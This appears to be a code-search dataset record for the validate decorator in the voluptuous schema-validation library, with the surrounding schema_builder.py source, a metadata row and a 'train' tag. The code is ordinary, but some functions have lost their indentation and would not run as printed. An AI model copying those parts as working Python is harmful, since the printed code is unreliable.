        # Compare against the other marker's wrapped schema, or the raw value.
        target = other.schema if isinstance(other, Marker) else other
        return self.schema < target
    def __hash__(self):
        return hash(self.schema)
    def __eq__(self, other):
        return self.schema == other
    def __ne__(self, other):
        return not (self.schema == other)
class Optional(Marker):
    """Mark a node in the schema as optional, and optionally provide a default
    >>> schema = Schema({Optional('key'): str})
    >>> schema({})
    {}
    >>> schema = Schema({Optional('key', default='value'): str})
    >>> schema({})
    {'key': 'value'}
    >>> schema = Schema({Optional('key', default=list): list})
    >>> schema({})
    {'key': []}
    If 'required' flag is set for an entire schema, optional keys aren't required
    >>> schema = Schema({
    ...    Optional('key'): str,
    ...    'key2': str
    ... }, required=True)
    >>> schema({'key2':'value'})
    {'key2': 'value'}
    """
    def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
        # Normalise the default into a zero-argument factory up front, then
        # delegate the common marker setup to the base class.
        self.default = default_factory(default)
        super(Optional, self).__init__(schema, msg=msg,
                                       description=description)
class Exclusive(Optional):
    """Mark a node in the schema as exclusive.
    Exclusive keys inherited from Optional:
    >>> schema = Schema({Exclusive('alpha', 'angles'): int, Exclusive('beta', 'angles'): int})
    >>> schema({'alpha': 30})
    {'alpha': 30}
    Keys inside a same group of exclusion cannot be together, it only makes sense for dictionaries:
    >>> with raises(er.MultipleInvalid, "two or more values in the same group of exclusion 'angles' @ data[<angles>]"):
    ...   schema({'alpha': 30, 'beta': 45})
    For example, API can provides multiple types of authentication, but only one works in the same time:
    >>> msg = 'Please, use only one type of authentication at the same time.'
    >>> schema = Schema({
    ... Exclusive('classic', 'auth', msg=msg):{
    ...     Required('email'): basestring,
    ...     Required('password'): basestring
    ...     },
    ... Exclusive('internal', 'auth', msg=msg):{
    ...     Required('secret_key'): basestring
    ...     },
    ... Exclusive('social', 'auth', msg=msg):{
    ...     Required('social_network'): basestring,
    ...     Required('token'): basestring
    ...     }
    ... })
    >>> with raises(er.MultipleInvalid, "Please, use only one type of authentication at the same time. @ data[<auth>]"):
    ...   schema({'classic': {'email': 'foo@example.com', 'password': 'bar'},
    ...           'social': {'social_network': 'barfoo', 'token': 'tEMp'}})
    """
    def __init__(self, schema, group_of_exclusion, msg=None, description=None):
        # Record the group label first; the base class handles the rest.
        self.group_of_exclusion = group_of_exclusion
        super(Exclusive, self).__init__(schema, msg=msg,
                                        description=description)
class Inclusive(Optional):
    """ Mark a node in the schema as inclusive.
    Inclusive keys inherited from Optional:
    >>> schema = Schema({
    ...     Inclusive('filename', 'file'): str,
    ...     Inclusive('mimetype', 'file'): str
    ... })
    >>> data = {'filename': 'dog.jpg', 'mimetype': 'image/jpeg'}
    >>> data == schema(data)
    True
    Keys inside a same group of inclusive must exist together, it only makes sense for dictionaries:
    >>> with raises(er.MultipleInvalid, "some but not all values in the same group of inclusion 'file' @ data[<file>]"):
    ...     schema({'filename': 'dog.jpg'})
    If none of the keys in the group are present, it is accepted:
    >>> schema({})
    {}
    For example, API can return 'height' and 'width' together, but not separately.
    >>> msg = "Height and width must exist together"
    >>> schema = Schema({
    ...     Inclusive('height', 'size', msg=msg): int,
    ...     Inclusive('width', 'size', msg=msg): int
    ... })
    >>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
    ...     schema({'height': 100})
    >>> with raises(er.MultipleInvalid, msg + " @ data[<size>]"):
    ...     schema({'width': 100})
    >>> data = {'height': 100, 'width': 100}
    >>> data == schema(data)
    True
    """
    def __init__(self, schema, group_of_inclusion,
                 msg=None, description=None, default=UNDEFINED):
        # Record the group label first; Optional handles msg/default setup.
        self.group_of_inclusion = group_of_inclusion
        super(Inclusive, self).__init__(schema, msg=msg, default=default,
                                        description=description)
class Required(Marker):
    """Mark a node in the schema as being required, and optionally provide a default value.
    >>> schema = Schema({Required('key'): str})
    >>> with raises(er.MultipleInvalid, "required key not provided @ data['key']"):
    ...   schema({})
    >>> schema = Schema({Required('key', default='value'): str})
    >>> schema({})
    {'key': 'value'}
    >>> schema = Schema({Required('key', default=list): list})
    >>> schema({})
    {'key': []}
    """
    def __init__(self, schema, msg=None, default=UNDEFINED, description=None):
        # Normalise the default into a zero-argument factory up front, then
        # delegate the common marker setup to the base class.
        self.default = default_factory(default)
        super(Required, self).__init__(schema, msg=msg,
                                       description=description)
class Remove(Marker):
    """Mark a node in the schema to be removed and excluded from the validated
    output. Keys that fail validation will not raise ``Invalid``. Instead, these
    keys will be treated as extras.
    >>> schema = Schema({str: int, Remove(int): str})
    >>> with raises(er.MultipleInvalid, "extra keys not allowed @ data[1]"):
    ...    schema({'keep': 1, 1: 1.0})
    >>> schema({1: 'red', 'red': 1, 2: 'green'})
    {'red': 1}
    >>> schema = Schema([int, Remove(float), Extra])
    >>> schema([1, 2, 3, 4.0, 5, 6.0, '7'])
    [1, 2, 3, 5, '7']
    """
    def __hash__(self):
        # Identity-based hash so every Remove marker is a distinct dict key.
        return object.__hash__(self)
    def __repr__(self):
        return "Remove(%r)" % (self.schema,)
    def __call__(self, v):
        # Validate only for its side effects; the class object itself is the
        # sentinel telling the compilers to drop the matched value.
        super(Remove, self).__call__(v)
        return self.__class__
def message(default=None, cls=None):
    """Convenience decorator to allow functions to provide a message.
    Set a default message:
    >>> @message('not an integer')
    ... def isint(v):
    ...   return int(v)
    >>> validate = Schema(isint())
    >>> with raises(er.MultipleInvalid, 'not an integer'):
    ...   validate('a')
    The message can be overridden on a per validator basis:
    >>> validate = Schema(isint('bad'))
    >>> with raises(er.MultipleInvalid, 'bad'):
    ...   validate('a')
    The class thrown too:
    >>> class IntegerInvalid(er.Invalid): pass
    >>> validate = Schema(isint('bad', clsoverride=IntegerInvalid))
    >>> try:
    ...   validate('a')
    ... except er.MultipleInvalid as e:
    ...   assert isinstance(e.errors[0], IntegerInvalid)
    """
    if cls and not issubclass(cls, er.Invalid):
        # Fixed typo in the error message: "subclases" -> "subclasses".
        raise er.SchemaError("message can only use subclasses of Invalid as custom class")
    def decorator(f):
        @wraps(f)
        def check(msg=None, clsoverride=None):
            @wraps(f)
            def wrapper(*args, **kwargs):
                try:
                    return f(*args, **kwargs)
                except ValueError:
                    # Resolution order for both class and message:
                    # per-call override -> decorator default -> generic.
                    raise (clsoverride or cls or er.ValueInvalid)(msg or default or 'invalid value')
            return wrapper
        return check
    return decorator
def _args_to_dict(func, args):
"""Returns argument names as values as key-value pairs."""
if sys.version_info >= (3, 0):
arg_count = func.__code__.co_argcount
arg_names = func.__code__.co_varnames[:arg_count]
else:
arg_count = func.func_code.co_argcount
arg_names = func.func_code.co_varnames[:arg_count]
arg_value_list = list(args)
arguments = dict((arg_name, arg_value_list[i])
for i, arg_name in enumerate(arg_names)
if i < len(arg_value_list))
return arguments
def validate(*a, **kw):
    """Decorator for validating arguments of a function against a given schema.
    Set restrictions for arguments:
    >>> @validate(arg1=int, arg2=int)
    ... def foo(arg1, arg2):
    ...   return arg1 * arg2
    Set restriction for returned value:
    >>> @validate(arg=int, __return__=int)
    ... def bar(arg1):
    ...   return arg1 * 2
    """
    # Reserved keyword used to attach a schema to the return value.
    RETURNS_KEY = '__return__'
    def validate_schema_decorator(func):
        returns_defined = False
        returns = None
        # Positional schemas are matched to the wrapped function's parameter
        # names, then merged with keyword schemas.
        # NOTE(review): _merge_args_with_kwargs is defined elsewhere in this
        # module; presumably keyword entries win on conflict -- confirm.
        schema_args_dict = _args_to_dict(func, a)
        schema_arguments = _merge_args_with_kwargs(schema_args_dict, kw)
        if RETURNS_KEY in schema_arguments:
            returns_defined = True
            returns = schema_arguments[RETURNS_KEY]
            del schema_arguments[RETURNS_KEY]
        # Fall back to identity (no validation) when no schema was supplied.
        input_schema = (Schema(schema_arguments, extra=ALLOW_EXTRA)
                        if len(schema_arguments) != 0 else lambda x: x)
        output_schema = Schema(returns) if returns_defined else lambda x: x
        @wraps(func)
        def func_wrapper(*args, **kwargs):
            args_dict = _args_to_dict(func, args)
            arguments = _merge_args_with_kwargs(args_dict, kwargs)
            validated_arguments = input_schema(arguments)
            # All arguments are forwarded as keywords after validation.
            output = func(**validated_arguments)
            return output_schema(output)
        return func_wrapper
    return validate_schema_decorator
|
alecthomas/voluptuous | voluptuous/schema_builder.py | validate | python | def validate(*a, **kw):
RETURNS_KEY = '__return__'
def validate_schema_decorator(func):
returns_defined = False
returns = None
schema_args_dict = _args_to_dict(func, a)
schema_arguments = _merge_args_with_kwargs(schema_args_dict, kw)
if RETURNS_KEY in schema_arguments:
returns_defined = True
returns = schema_arguments[RETURNS_KEY]
del schema_arguments[RETURNS_KEY]
input_schema = (Schema(schema_arguments, extra=ALLOW_EXTRA)
if len(schema_arguments) != 0 else lambda x: x)
output_schema = Schema(returns) if returns_defined else lambda x: x
@wraps(func)
def func_wrapper(*args, **kwargs):
args_dict = _args_to_dict(func, args)
arguments = _merge_args_with_kwargs(args_dict, kwargs)
validated_arguments = input_schema(arguments)
output = func(**validated_arguments)
return output_schema(output)
return func_wrapper
return validate_schema_decorator | Decorator for validating arguments of a function against a given schema.
Set restrictions for arguments:
>>> @validate(arg1=int, arg2=int)
... def foo(arg1, arg2):
... return arg1 * arg2
Set restriction for returned value:
>>> @validate(arg=int, __return__=int)
... def bar(arg1):
... return arg1 * 2 | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/schema_builder.py#L1256-L1301 | null | import collections
import inspect
import re
from functools import wraps
import sys
from contextlib import contextmanager
import itertools
from voluptuous import error as er
if sys.version_info >= (3,):
    # Python 3: alias the removed Python 2 builtins to their 3.x
    # equivalents so the rest of the module can use a single spelling.
    long = int
    unicode = str
    basestring = str
    ifilter = filter
    def iteritems(d):
        # dict.items() is already a lazy view on Python 3.
        return d.items()
else:
    from itertools import ifilter
    def iteritems(d):
        return d.iteritems()
if sys.version_info >= (3, 3):
    # The collections ABCs moved to collections.abc in Python 3.3.
    _Mapping = collections.abc.Mapping
else:
    _Mapping = collections.Mapping
"""Schema validation for Python data structures.
Given eg. a nested data structure like this:
{
'exclude': ['Users', 'Uptime'],
'include': [],
'set': {
'snmp_community': 'public',
'snmp_timeout': 15,
'snmp_version': '2c',
},
'targets': {
'localhost': {
'exclude': ['Uptime'],
'features': {
'Uptime': {
'retries': 3,
},
'Users': {
'snmp_community': 'monkey',
'snmp_port': 15,
},
},
'include': ['Users'],
'set': {
'snmp_community': 'monkeys',
},
},
},
}
A schema like this:
>>> settings = {
... 'snmp_community': str,
... 'retries': int,
... 'snmp_version': All(Coerce(str), Any('3', '2c', '1')),
... }
>>> features = ['Ping', 'Uptime', 'Http']
>>> schema = Schema({
... 'exclude': features,
... 'include': features,
... 'set': settings,
... 'targets': {
... 'exclude': features,
... 'include': features,
... 'features': {
... str: settings,
... },
... },
... })
Validate like so:
>>> schema({
... 'set': {
... 'snmp_community': 'public',
... 'snmp_version': '2c',
... },
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {
... 'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'},
... },
... },
... }) == {
... 'set': {'snmp_version': '2c', 'snmp_community': 'public'},
... 'targets': {
... 'exclude': ['Ping'],
... 'features': {'Uptime': {'retries': 3},
... 'Users': {'snmp_community': 'monkey'}}}}
True
"""
# options for extra keys
PREVENT_EXTRA = 0 # any extra key not in schema will raise an error
ALLOW_EXTRA = 1 # extra keys not in schema will be included in output
REMOVE_EXTRA = 2 # extra keys not in schema will be excluded from output
def _isnamedtuple(obj):
return isinstance(obj, tuple) and hasattr(obj, '_fields')
primitive_types = (str, unicode, bool, int, float)
class Undefined(object):
    """Falsy sentinel for "no value supplied" (e.g. unset marker defaults)."""
    def __bool__(self):
        # Bug fix: only __nonzero__ was defined, so on Python 3 (which this
        # module explicitly supports) bool(UNDEFINED) evaluated to True,
        # defeating the falsy-sentinel intent.
        return False
    # Python 2 truthiness protocol uses __nonzero__.
    __nonzero__ = __bool__
    def __repr__(self):
        return '...'
UNDEFINED = Undefined()
def Self():
    # Sentinel for self-referential (recursive) schemas: Schema._compile
    # matches it by identity and never invokes it, so reaching this body
    # indicates a programming error.
    raise er.SchemaError('"Self" should never be called')
def default_factory(value):
    """Wrap *value* in a zero-argument factory.

    Callables and the UNDEFINED sentinel pass through untouched; any other
    value is captured in a closure that returns it.
    """
    if value is UNDEFINED or callable(value):
        return value
    def factory():
        return value
    return factory
@contextmanager
def raises(exc, msg=None, regex=None):
    """Context manager asserting that the body raises *exc*, optionally with
    an exact message or a message matching *regex*.

    Note: if the body raises nothing at all, the manager passes silently.
    """
    try:
        yield
    except exc as e:
        text = str(e)
        if msg is not None:
            assert text == msg, '%r != %r' % (text, msg)
        if regex is not None:
            assert re.search(regex, text), '%r does not match %r' % (text, regex)
def Extra(_):
    """Allow keys in the data that are not present in the schema."""
    # Sentinel only: Schema._compile checks "schema is Extra" and returns a
    # pass-through validator, so this function is never actually invoked.
    raise er.SchemaError('"Extra" should never be called')
# As extra() is never called there's no way to catch references to the
# deprecated object, so we just leave an alias here instead.
extra = Extra
class Schema(object):
    """A validation schema.
    The schema is a Python tree-like structure where nodes are pattern
    matched against corresponding trees of values.
    Nodes can be values, in which case a direct comparison is used, types,
    in which case an isinstance() check is performed, or callables, which will
    validate and optionally convert the value.
    We can equate schemas also.
    For Example:
    >>> v = Schema({Required('a'): unicode})
    >>> v1 = Schema({Required('a'): unicode})
    >>> v2 = Schema({Required('b'): unicode})
    >>> assert v == v1
    >>> assert v != v2
    """
    # Maps the numeric `extra` policy back to its symbolic name for __repr__.
    _extra_to_name = {
        REMOVE_EXTRA: 'REMOVE_EXTRA',
        ALLOW_EXTRA: 'ALLOW_EXTRA',
        PREVENT_EXTRA: 'PREVENT_EXTRA',
    }
    def __init__(self, schema, required=False, extra=PREVENT_EXTRA):
        """Create a new Schema.
        :param schema: Validation schema. See :module:`voluptuous` for details.
        :param required: Keys defined in the schema must be in the data.
        :param extra: Specify how extra keys in the data are treated:
            - :const:`~voluptuous.PREVENT_EXTRA`: to disallow any undefined
              extra keys (raise ``Invalid``).
            - :const:`~voluptuous.ALLOW_EXTRA`: to include undefined extra
              keys in the output.
            - :const:`~voluptuous.REMOVE_EXTRA`: to exclude undefined extra keys
              from the output.
            - Any value other than the above defaults to
              :const:`~voluptuous.PREVENT_EXTRA`
        """
        self.schema = schema
        self.required = required
        self.extra = int(extra)  # ensure the value is an integer
        # The schema is compiled once, up front, into a validator callable.
        self._compiled = self._compile(schema)
    @classmethod
    def infer(cls, data, **kwargs):
        """Create a Schema from concrete data (e.g. an API response).
        For example, this will take a dict like:
        {
            'foo': 1,
            'bar': {
                'a': True,
                'b': False
            },
            'baz': ['purple', 'monkey', 'dishwasher']
        }
        And return a Schema:
        {
            'foo': int,
            'bar': {
                'a': bool,
                'b': bool
            },
            'baz': [str]
        }
        Note: only very basic inference is supported.
        """
        def value_to_schema_type(value):
            # Recursively replace concrete values by their types; empty
            # containers map to the bare container type.
            if isinstance(value, dict):
                if len(value) == 0:
                    return dict
                return {k: value_to_schema_type(v)
                        for k, v in iteritems(value)}
            if isinstance(value, list):
                if len(value) == 0:
                    return list
                else:
                    return [value_to_schema_type(v)
                            for v in value]
            return type(value)
        return cls(value_to_schema_type(data), **kwargs)
    def __eq__(self, other):
        if not isinstance(other, Schema):
            return False
        return other.schema == self.schema
    def __ne__(self, other):
        return not (self == other)
    def __str__(self):
        return str(self.schema)
    def __repr__(self):
        return "<Schema(%s, extra=%s, required=%s) object at 0x%x>" % (
            self.schema, self._extra_to_name.get(self.extra, '??'),
            self.required, id(self))
    def __call__(self, data):
        """Validate data against this schema."""
        try:
            return self._compiled([], data)
        except er.MultipleInvalid:
            raise
        except er.Invalid as e:
            # Normalise single errors to MultipleInvalid for a uniform API.
            raise er.MultipleInvalid([e])
        # return self.validate([], self.schema, data)
    def _compile(self, schema):
        # Dispatch on the schema node kind; sentinels and the compile hook
        # are checked before generic container/scalar handling.
        if schema is Extra:
            return lambda _, v: v
        if schema is Self:
            return lambda p, v: self._compiled(p, v)
        elif hasattr(schema, "__voluptuous_compile__"):
            return schema.__voluptuous_compile__(self)
        if isinstance(schema, Object):
            return self._compile_object(schema)
        if isinstance(schema, _Mapping):
            return self._compile_dict(schema)
        elif isinstance(schema, list):
            return self._compile_list(schema)
        elif isinstance(schema, tuple):
            return self._compile_tuple(schema)
        elif isinstance(schema, (frozenset, set)):
            return self._compile_set(schema)
        type_ = type(schema)
        if inspect.isclass(schema):
            type_ = schema
        if type_ in (bool, bytes, int, long, str, unicode, float, complex, object,
                     list, dict, type(None)) or callable(schema):
            return _compile_scalar(schema)
        raise er.SchemaError('unsupported schema data type %r' %
                             type(schema).__name__)
    def _compile_mapping(self, schema, invalid_msg=None):
        """Create validator for given mapping."""
        invalid_msg = invalid_msg or 'mapping value'
        # Keys that may be required
        all_required_keys = set(key for key in schema
                                if key is not Extra and
                                ((self.required and not isinstance(key, (Optional, Remove))) or
                                 isinstance(key, Required)))
        # Keys that may have defaults
        all_default_keys = set(key for key in schema
                               if isinstance(key, Required) or
                               isinstance(key, Optional))
        _compiled_schema = {}
        for skey, svalue in iteritems(schema):
            new_key = self._compile(skey)
            new_value = self._compile(svalue)
            _compiled_schema[skey] = (new_key, new_value)
        candidates = list(_iterate_mapping_candidates(_compiled_schema))
        # After we have the list of candidates in the correct order, we want to apply some optimization so that each
        # key in the data being validated will be matched against the relevant schema keys only.
        # No point in matching against different keys
        additional_candidates = []
        candidates_by_key = {}
        for skey, (ckey, cvalue) in candidates:
            if type(skey) in primitive_types:
                candidates_by_key.setdefault(skey, []).append((skey, (ckey, cvalue)))
            elif isinstance(skey, Marker) and type(skey.schema) in primitive_types:
                candidates_by_key.setdefault(skey.schema, []).append((skey, (ckey, cvalue)))
            else:
                # These are wildcards such as 'int', 'str', 'Remove' and others which should be applied to all keys
                additional_candidates.append((skey, (ckey, cvalue)))
        def validate_mapping(path, iterable, out):
            required_keys = all_required_keys.copy()
            # Build a map of all provided key-value pairs.
            # The type(out) is used to retain ordering in case a ordered
            # map type is provided as input.
            key_value_map = type(out)()
            for key, value in iterable:
                key_value_map[key] = value
            # Insert default values for non-existing keys.
            for key in all_default_keys:
                if not isinstance(key.default, Undefined) and \
                        key.schema not in key_value_map:
                    # A default value has been specified for this missing
                    # key, insert it.
                    key_value_map[key.schema] = key.default()
            error = None
            errors = []
            for key, value in key_value_map.items():
                key_path = path + [key]
                remove_key = False
                # Optimization. Validate against the matching key first, then fallback to the rest
                relevant_candidates = itertools.chain(candidates_by_key.get(key, []), additional_candidates)
                # compare each given key/value against all compiled key/values
                # schema key, (compiled key, compiled value)
                for skey, (ckey, cvalue) in relevant_candidates:
                    try:
                        new_key = ckey(key_path, key)
                    except er.Invalid as e:
                        if len(e.path) > len(key_path):
                            raise
                        if not error or len(e.path) > len(error.path):
                            error = e
                        continue
                    # Backtracking is not performed once a key is selected, so if
                    # the value is invalid we immediately throw an exception.
                    exception_errors = []
                    # check if the key is marked for removal
                    is_remove = new_key is Remove
                    try:
                        cval = cvalue(key_path, value)
                        # include if it's not marked for removal
                        if not is_remove:
                            out[new_key] = cval
                        else:
                            remove_key = True
                            continue
                    except er.MultipleInvalid as e:
                        exception_errors.extend(e.errors)
                    except er.Invalid as e:
                        exception_errors.append(e)
                    if exception_errors:
                        if is_remove or remove_key:
                            continue
                        for err in exception_errors:
                            if len(err.path) <= len(key_path):
                                err.error_type = invalid_msg
                            errors.append(err)
                        # If there is a validation error for a required
                        # key, this means that the key was provided.
                        # Discard the required key so it does not
                        # create an additional, noisy exception.
                        required_keys.discard(skey)
                        break
                    # Key and value okay, mark as found in case it was
                    # a Required() field.
                    required_keys.discard(skey)
                    break
                else:
                    # No schema key matched this data key: apply the
                    # configured extra-keys policy.
                    if remove_key:
                        # remove key
                        continue
                    elif self.extra == ALLOW_EXTRA:
                        out[key] = value
                    elif self.extra != REMOVE_EXTRA:
                        errors.append(er.Invalid('extra keys not allowed', key_path))
                    # else REMOVE_EXTRA: ignore the key so it's removed from output
            # for any required keys left that weren't found and don't have defaults:
            for key in required_keys:
                msg = key.msg if hasattr(key, 'msg') and key.msg else 'required key not provided'
                errors.append(er.RequiredFieldInvalid(msg, path + [key]))
            if errors:
                raise er.MultipleInvalid(errors)
            return out
        return validate_mapping
    def _compile_object(self, schema):
        """Validate an object.
        Has the same behavior as dictionary validator but work with object
        attributes.
        For example:
        >>> class Structure(object):
        ...     def __init__(self, one=None, three=None):
        ...         self.one = one
        ...         self.three = three
        ...
        >>> validate = Schema(Object({'one': 'two', 'three': 'four'}, cls=Structure))
        >>> with raises(er.MultipleInvalid, "not a valid value for object value @ data['one']"):
        ...   validate(Structure(one='three'))
        """
        base_validate = self._compile_mapping(
            schema, invalid_msg='object value')
        def validate_object(path, data):
            if schema.cls is not UNDEFINED and not isinstance(data, schema.cls):
                raise er.ObjectInvalid('expected a {0!r}'.format(schema.cls), path)
            # None-valued attributes are filtered out before validation.
            iterable = _iterate_object(data)
            iterable = ifilter(lambda item: item[1] is not None, iterable)
            out = base_validate(path, iterable, {})
            return type(data)(**out)
        return validate_object
    def _compile_dict(self, schema):
        """Validate a dictionary.
        A dictionary schema can contain a set of values, or at most one
        validator function/type.
        A dictionary schema will only validate a dictionary:
        >>> validate = Schema({})
        >>> with raises(er.MultipleInvalid, 'expected a dictionary'):
        ...   validate([])
        An invalid dictionary value:
        >>> validate = Schema({'one': 'two', 'three': 'four'})
        >>> with raises(er.MultipleInvalid, "not a valid value for dictionary value @ data['one']"):
        ...   validate({'one': 'three'})
        An invalid key:
        >>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['two']"):
        ...   validate({'two': 'three'})
        Validation function, in this case the "int" type:
        >>> validate = Schema({'one': 'two', 'three': 'four', int: str})
        Valid integer input:
        >>> validate({10: 'twenty'})
        {10: 'twenty'}
        By default, a "type" in the schema (in this case "int") will be used
        purely to validate that the corresponding value is of that type. It
        will not Coerce the value:
        >>> with raises(er.MultipleInvalid, "extra keys not allowed @ data['10']"):
        ...   validate({'10': 'twenty'})
        Wrap them in the Coerce() function to achieve this:
        >>> from voluptuous import Coerce
        >>> validate = Schema({'one': 'two', 'three': 'four',
        ...                    Coerce(int): str})
        >>> validate({'10': 'twenty'})
        {10: 'twenty'}
        Custom message for required key
        >>> validate = Schema({Required('one', 'required'): 'two'})
        >>> with raises(er.MultipleInvalid, "required @ data['one']"):
        ...   validate({})
        (This is to avoid unexpected surprises.)
        Multiple errors for nested field in a dict:
        >>> validate = Schema({
        ...     'adict': {
        ...         'strfield': str,
        ...         'intfield': int
        ...     }
        ... })
        >>> try:
        ...     validate({
        ...         'adict': {
        ...             'strfield': 123,
        ...             'intfield': 'one'
        ...         }
        ...     })
        ... except er.MultipleInvalid as e:
        ...     print(sorted(str(i) for i in e.errors))  # doctest: +NORMALIZE_WHITESPACE
        ["expected int for dictionary value @ data['adict']['intfield']",
         "expected str for dictionary value @ data['adict']['strfield']"]
        """
        base_validate = self._compile_mapping(
            schema, invalid_msg='dictionary value')
        groups_of_exclusion = {}
        groups_of_inclusion = {}
        for node in schema:
            if isinstance(node, Exclusive):
                g = groups_of_exclusion.setdefault(node.group_of_exclusion, [])
                g.append(node)
            elif isinstance(node, Inclusive):
                g = groups_of_inclusion.setdefault(node.group_of_inclusion, [])
                g.append(node)
        def validate_dict(path, data):
            if not isinstance(data, dict):
                raise er.DictInvalid('expected a dictionary', path)
            errors = []
            # At most one key from each exclusion group may be present.
            for label, group in groups_of_exclusion.items():
                exists = False
                for exclusive in group:
                    if exclusive.schema in data:
                        if exists:
                            msg = exclusive.msg if hasattr(exclusive, 'msg') and exclusive.msg else \
                                "two or more values in the same group of exclusion '%s'" % label
                            next_path = path + [VirtualPathComponent(label)]
                            errors.append(er.ExclusiveInvalid(msg, next_path))
                            break
                        exists = True
            if errors:
                raise er.MultipleInvalid(errors)
            # Keys in an inclusion group must appear all together or not at all.
            for label, group in groups_of_inclusion.items():
                included = [node.schema in data for node in group]
                if any(included) and not all(included):
                    msg = "some but not all values in the same group of inclusion '%s'" % label
                    for g in group:
                        if hasattr(g, 'msg') and g.msg:
                            msg = g.msg
                            break
                    next_path = path + [VirtualPathComponent(label)]
                    errors.append(er.InclusiveInvalid(msg, next_path))
                    break
            if errors:
                raise er.MultipleInvalid(errors)
            out = data.__class__()
            return base_validate(path, iteritems(data), out)
        return validate_dict
    def _compile_sequence(self, schema, seq_type):
        """Validate a sequence type.
        This is a sequence of valid values or validators tried in order.
        >>> validator = Schema(['one', 'two', int])
        >>> validator(['one'])
        ['one']
        >>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
        ...   validator([3.5])
        >>> validator([1])
        [1]
        """
        _compiled = [self._compile(s) for s in schema]
        seq_type_name = seq_type.__name__
        def validate_sequence(path, data):
            if not isinstance(data, seq_type):
                raise er.SequenceTypeInvalid('expected a %s' % seq_type_name, path)
            # Empty seq schema, allow any data.
            if not schema:
                if data:
                    raise er.MultipleInvalid([
                        er.ValueInvalid('not a valid value', [value]) for value in data
                    ])
                return data
            out = []
            invalid = None
            errors = []
            index_path = UNDEFINED
            for i, value in enumerate(data):
                index_path = path + [i]
                invalid = None
                # First matching sub-validator wins for each element.
                for validate in _compiled:
                    try:
                        cval = validate(index_path, value)
                        if cval is not Remove:  # do not include Remove values
                            out.append(cval)
                        break
                    except er.Invalid as e:
                        if len(e.path) > len(index_path):
                            raise
                        invalid = e
                else:
                    errors.append(invalid)
            if errors:
                raise er.MultipleInvalid(errors)
            if _isnamedtuple(data):
                return type(data)(*out)
            else:
                return type(data)(out)
        return validate_sequence
    def _compile_tuple(self, schema):
        """Validate a tuple.
        A tuple is a sequence of valid values or validators tried in order.
        >>> validator = Schema(('one', 'two', int))
        >>> validator(('one',))
        ('one',)
        >>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
        ...   validator((3.5,))
        >>> validator((1,))
        (1,)
        """
        return self._compile_sequence(schema, tuple)
    def _compile_list(self, schema):
        """Validate a list.
        A list is a sequence of valid values or validators tried in order.
        >>> validator = Schema(['one', 'two', int])
        >>> validator(['one'])
        ['one']
        >>> with raises(er.MultipleInvalid, 'expected int @ data[0]'):
        ...   validator([3.5])
        >>> validator([1])
        [1]
        """
        return self._compile_sequence(schema, list)
    def _compile_set(self, schema):
        """Validate a set.
        A set is an unordered collection of unique elements.
        >>> validator = Schema({int})
        >>> validator(set([42])) == set([42])
        True
        >>> with raises(er.Invalid, 'expected a set'):
        ...   validator(42)
        >>> with raises(er.MultipleInvalid, 'invalid value in set'):
        ...   validator(set(['a']))
        """
        type_ = type(schema)
        type_name = type_.__name__
        def validate_set(path, data):
            if not isinstance(data, type_):
                raise er.Invalid('expected a %s' % type_name, path)
            _compiled = [self._compile(s) for s in schema]
            errors = []
            # Each element must satisfy at least one sub-validator.
            for value in data:
                for validate in _compiled:
                    try:
                        validate(path, value)
                        break
                    except er.Invalid:
                        pass
                else:
                    invalid = er.Invalid('invalid value in %s' % type_name, path)
                    errors.append(invalid)
            if errors:
                raise er.MultipleInvalid(errors)
            return data
        return validate_set
    def extend(self, schema, required=None, extra=None):
        """Create a new `Schema` by merging this and the provided `schema`.
        Neither this `Schema` nor the provided `schema` are modified. The
        resulting `Schema` inherits the `required` and `extra` parameters of
        this, unless overridden.
        Both schemas must be dictionary-based.
        :param schema: dictionary to extend this `Schema` with
        :param required: if set, overrides `required` of this `Schema`
        :param extra: if set, overrides `extra` of this `Schema`
        """
        assert type(self.schema) == dict and type(schema) == dict, 'Both schemas must be dictionary-based'
        result = self.schema.copy()
        # returns the key that may have been passed as argument to Marker constructor
        def key_literal(key):
            return (key.schema if isinstance(key, Marker) else key)
        # build a map that takes the key literals to the needed objects
        # literal -> Required|Optional|literal
        result_key_map = dict((key_literal(key), key) for key in result)
        # for each item in the extension schema, replace duplicates
        # or add new keys
        for key, value in iteritems(schema):
            # if the key is already in the dictionary, we need to replace it
            # transform key to literal before checking presence
            if key_literal(key) in result_key_map:
                result_key = result_key_map[key_literal(key)]
                result_value = result[result_key]
                # if both are dictionaries, we need to extend recursively
                # create the new extended sub schema, then remove the old key and add the new one
                if type(result_value) == dict and type(value) == dict:
                    new_value = Schema(result_value).extend(value).schema
                    del result[result_key]
                    result[key] = new_value
                # one or the other or both are not sub-schemas, simple replacement is fine
                # remove old key and add new one
                else:
                    del result[result_key]
                    result[key] = value
            # key is new and can simply be added
            else:
                result[key] = value
        # recompile and send old object
        result_cls = type(self)
        result_required = (required if required is not None else self.required)
        result_extra = (extra if extra is not None else self.extra)
        return result_cls(result, required=result_required, extra=result_extra)
def _compile_scalar(schema):
"""A scalar value.
The schema can either be a value or a type.
>>> _compile_scalar(int)([], 1)
1
>>> with raises(er.Invalid, 'expected float'):
... _compile_scalar(float)([], '1')
Callables have
>>> _compile_scalar(lambda v: float(v))([], '1')
1.0
As a convenience, ValueError's are trapped:
>>> with raises(er.Invalid, 'not a valid value'):
... _compile_scalar(lambda v: float(v))([], 'a')
"""
if inspect.isclass(schema):
def validate_instance(path, data):
if isinstance(data, schema):
return data
else:
msg = 'expected %s' % schema.__name__
raise er.TypeInvalid(msg, path)
return validate_instance
if callable(schema):
def validate_callable(path, data):
try:
return schema(data)
except ValueError as e:
raise er.ValueInvalid('not a valid value', path)
except er.Invalid as e:
e.prepend(path)
raise
return validate_callable
def validate_value(path, data):
if data != schema:
raise er.ScalarInvalid('not a valid value', path)
return data
return validate_value
def _compile_itemsort():
    '''return sort function of mappings'''
    # Predicates classifying a schema key, used to assign a match priority.
    def is_extra(key_):
        return key_ is Extra
    def is_remove(key_):
        return isinstance(key_, Remove)
    def is_marker(key_):
        return isinstance(key_, Marker)
    def is_type(key_):
        return inspect.isclass(key_)
    def is_callable(key_):
        return callable(key_)
